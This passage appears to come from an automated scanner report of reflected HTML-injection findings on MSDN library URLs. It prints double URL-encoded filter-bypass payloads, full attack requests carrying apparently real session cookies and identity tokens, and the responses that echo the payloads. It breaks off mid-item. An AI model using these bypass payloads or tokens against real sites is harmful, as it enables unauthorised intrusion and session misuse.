P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya19f7"><a>3cb7c16355f/dd582939(office.11)" />
...[SNIP]...

2.74. http://msdn.microsoft.com/en-us/library/dd582939(office.11).aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582939(office.11).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebecd%2522%253e%253ca%253eadfdc378508 was submitted in the REST URL parameter 3. This input was echoed as ebecd"><a>adfdc378508 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582939(office.11).aspxebecd%2522%253e%253ca%253eadfdc378508 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9231
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582939(office.11).aspxebecd"><a>adfdc378508" />
...[SNIP]...

2.75. http://msdn.microsoft.com/en-us/library/dd582940(office.11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582940(office.11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67864%2522%253e%253ca%253ecad7ddbae4c was submitted in the REST URL parameter 1. This input was echoed as 67864"><a>cad7ddbae4c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us67864%2522%253e%253ca%253ecad7ddbae4c/library/dd582940(office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9220
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us67864"><a>cad7ddbae4c/library/dd582940(office.11" />
...[SNIP]...

2.76. http://msdn.microsoft.com/en-us/library/dd582940(office.11 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582940(office.11

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6921d%2522%253e%253ca%253e979c28d57ca was submitted in the REST URL parameter 2. This input was echoed as 6921d"><a>979c28d57ca in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library6921d%2522%253e%253ca%253e979c28d57ca/dd582940(office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library6921d"><a>979c28d57ca/dd582940(office.11" />
...[SNIP]...

2.77. http://msdn.microsoft.com/en-us/library/dd582940(office.11 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582940(office.11

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54a8e%2522%253e%253ca%253edc8afda3d17 was submitted in the REST URL parameter 3. This input was echoed as 54a8e"><a>dc8afda3d17 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582940(office.1154a8e%2522%253e%253ca%253edc8afda3d17 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582940(office.1154a8e"><a>dc8afda3d17" />
...[SNIP]...

2.78. http://msdn.microsoft.com/en-us/library/dd582940(office.11).aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582940(office.11).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18002%2522%253e%253ca%253e6324386485a was submitted in the REST URL parameter 1. This input was echoed as 18002"><a>6324386485a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us18002%2522%253e%253ca%253e6324386485a/library/dd582940(office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.NumberOfVisits=1&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8J00021AU0002g1AU00

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:55:53 GMT
Content-Length: 9196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us18002"><a>6324386485a/library/dd582940(office.11)" />
...[SNIP]...

2.79. http://msdn.microsoft.com/en-us/library/dd582940(office.11).aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582940(office.11).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c36af%2522%253e%253ca%253e86108dcf880 was submitted in the REST URL parameter 2. This input was echoed as c36af"><a>86108dcf880 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

